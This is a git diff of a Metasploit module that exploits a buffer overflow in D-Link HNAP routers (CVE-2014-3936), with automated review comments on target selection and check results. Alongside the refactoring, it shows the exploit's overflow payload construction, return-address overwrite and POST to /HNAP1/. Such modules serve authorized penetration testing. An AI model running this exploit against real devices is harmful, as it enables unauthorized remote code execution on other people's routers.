diff --git a/modules/exploits/linux/http/dlink_hnap_rop.rb b/modules/exploits/linux/http/dlink_hnap_rop.rb
index 0365195f79..9da05de400 100644
--- a/modules/exploits/linux/http/dlink_hnap_rop.rb
+++ b/modules/exploits/linux/http/dlink_hnap_rop.rb
@@ -15,23 +15,24 @@ class Metasploit3 < Msf::Exploit::Remote
 super(update_info(info,
 'Name' => 'D-Link HNAP Buffer Overflow in POST Request',
 'Description' => %q{
- This module exploits an anonymous remote code execution vulnerability on different D-Link devices.
- This module has been successfully tested on D-Link DIR-505 in an emulated environment.
+ This module exploits an anonymous remote code execution vulnerability on different
+ D-Link devices. This module has been successfully tested on D-Link DIR-505 in an
+ emulated environment.
 },
 'Author' =>
 [
- 'Craig Heffner', # vulnerability discovery and initial exploit
- 'Michael Messner ', # Metasploit module
+ 'Craig Heffner', # vulnerability discovery and initial exploit
+ 'Michael Messner ' # Metasploit module
 ],
 'License' => MSF_LICENSE,
- 'Platform' => ['linux'],
+ 'Platform' => 'linux',
 'Arch' => ARCH_MIPSBE,
 'References' =>
 [
- [ 'CVE', '2014-3936' ],
- [ 'BID', '67651' ],
- [ 'URL', 'http://www.devttys0.com/2014/05/hacking-the-d-link-dsp-w215-smart-plug/' ], # blog post from Craig including PoC
- [ 'URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10029' ]
+ ['CVE', '2014-3936'],
+ ['BID', '67651'],
+ ['URL', 'http://www.devttys0.com/2014/05/hacking-the-d-link-dsp-w215-smart-plug/'], # blog post from Craig including PoC
+ ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10029']
 ],
 'Targets' =>
 [
@@ -39,7 +40,6 @@ class Metasploit3 < Msf::Exploit::Remote
 # Automatic targeting via fingerprinting
 # [ 'Automatic Targeting', { 'auto' => true } ],
- [ 'D-Link DSP-W215 - v1.0', { 'Offset' => 1000000,
@@ -60,7 +60,9 @@ class Metasploit3 < Msf::Exploit::Remote
 ]
 ],
 'DisclosureDate' => 'May 15 2014',
- 'DefaultTarget' => 0))
+ 'DefaultTarget' => 0))
+
+ deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
 end
 def check
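Review bot: The new `deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')` call hides two CmdStager options from the user without recording why, and nothing nearby explains what fixes them instead. A one-line comment on it would save the next reader a trip to the mixin, e.g. `# decoder/flavor are presumably pinned by this module's cmdstager call, so don't expose them as options`. The mixin include and the cmdstager invocation are outside this hunk, so the stated reason is inferred and should be confirmed before the comment is kept.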
@@ -71,71 +73,38 @@ class Metasploit3 < Msf::Exploit::Remote
 }) if res && [200, 301, 302].include?(res.code)
-
- # trying to automatically detect a vulnerable device
- if (target['auto'])
- if res.body =~ /DIR-505/ && res.body =~ /1.07/
-
- self.targets.each do |t|
- if (t.name =~ /DIR-505.*1.07/) then
- @mytarget = t
- break
- end
- end
-
- elsif res.body =~ /DIR-505/ && res.body =~ /1.06/
-
- self.targets.each do |t|
- if (t.name =~ /DIR-505.*1.06/) then
- @mytarget = t
- break
- end
- end
-
- elsif res.body =~ /DSP-W215/ && res.body =~ /1.00/
-
- self.targets.each do |t|
- if (t.name =~ /DSP-W215.*1.00/) then
- @mytarget = t
- break
- end
- end
-
- else
- # no supported device found
- return Exploit::CheckCode::Unknown
- end
-
- print_status("#{peer} - Selected Target: #{@mytarget.name}")
- print_good("#{peer} - detected a vulnerable device")
- return Exploit::CheckCode::Detected
-
- # not auto-targetting ... the user is responsible
+ if res.body =~ /DIR-505/ && res.body =~ /1.07/
+ @my_target = targets[3] if target['auto']
+ return Exploit::CheckCode::Appears
+ elsif res.body =~ /DIR-505/ && res.body =~ /1.06/
+ @my_target = targets[2] if target['auto']
+ return Exploit::CheckCode::Appears
+ elsif res.body =~ /DSP-W215/ && res.body =~ /1.00/
+ @my_target = targets[1] if target['auto']
+ return Exploit::CheckCode::Appears
 else
- print_good("#{peer} - detected a device with unknown exploitability ... 
trying to exploit")
 return Exploit::CheckCode::Detected
 end
 end
 rescue ::Rex::ConnectionError
- return Exploit::CheckCode::Unknown
+ return Exploit::CheckCode::Safe
 end
 Exploit::CheckCode::Unknown
 end
- def target
- return @mytarget if @mytarget
- super
- end
-
 def exploit
 print_status("#{peer} - Trying to access the vulnerable URL...")
- # Use a copy of the target
- @mytarget = target
+ @my_target = target
+ check_code = check
- unless check == Exploit::CheckCode::Detected
- fail_with(Failure::Unknown, "#{peer} - Failed to detect a vulnerable device")
+ unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears
+ fail_with(Failure::NoTarget, "#{peer} - Failed to detect a vulnerable device")
+ end
+
+ if @my_target.nil? || @my_target['auto']
+ fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...")
 end
 print_status("#{peer} - Exploiting ...")
@@ -146,13 +115,13 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 def prepare_shellcode(cmd)
- buf = rand_text_alpha_upper(@mytarget['Offset']) # Stack filler
+ buf = rand_text_alpha_upper(@my_target['Offset']) # Stack filler
 buf << rand_text_alpha_upper(4) # $s0, don't care
 buf << rand_text_alpha_upper(4) # $s1, don't care
 buf << rand_text_alpha_upper(4) # $s2, don't care
 buf << rand_text_alpha_upper(4) # $s3, don't care
 buf << rand_text_alpha_upper(4) # $s4, don't care
- buf << @mytarget['Ret'] # $ra
+ buf << @my_target['Ret'] # $ra
 # la $t9, system
 # la $s1, 0x440000
@@ -172,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'method' => 'POST',
 'uri' => "/HNAP1/",
 'encode_params' => false,
- 'data' => shellcode,
+ 'data' => shellcode
 })
 return res
 rescue ::Rex::ConnectionError
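Review bot: The auto-targeting branches in check now pick `targets[3]`, `targets[2]` and `targets[1]` by position, so the fingerprint-to-target mapping silently breaks whenever the Targets array is edited — and the -39 hunk of this same commit removes at least the opening line of a target entry, which is exactly that kind of shift. Selecting by name keeps the coupling visible, e.g. `@my_target = targets.find { |t| t.name =~ /DIR-505.*1\.07/ } if target['auto']` and likewise for the 1.06 and DSP-W215 branches; the dots in the version regexes should be escaped in the body checks too, since `/1.07/` also matches text like "1x07". Separately, the rescue for ::Rex::ConnectionError now returns `Exploit::CheckCode::Safe`, which reports a host as not vulnerable when it was merely unreachable; the previous `Exploit::CheckCode::Unknown` is the honest result for a failed connection. Worth noting as well that check sets @my_target as a side effect and exploit depends on that after calling it, so a one-line comment on the first assignment (`# auto-target selection: consumed by exploit after check returns`) would keep that coupling from being lost. The check method begins in the previous hunk line and the send_request_cgi call it rescues around starts outside the hunk.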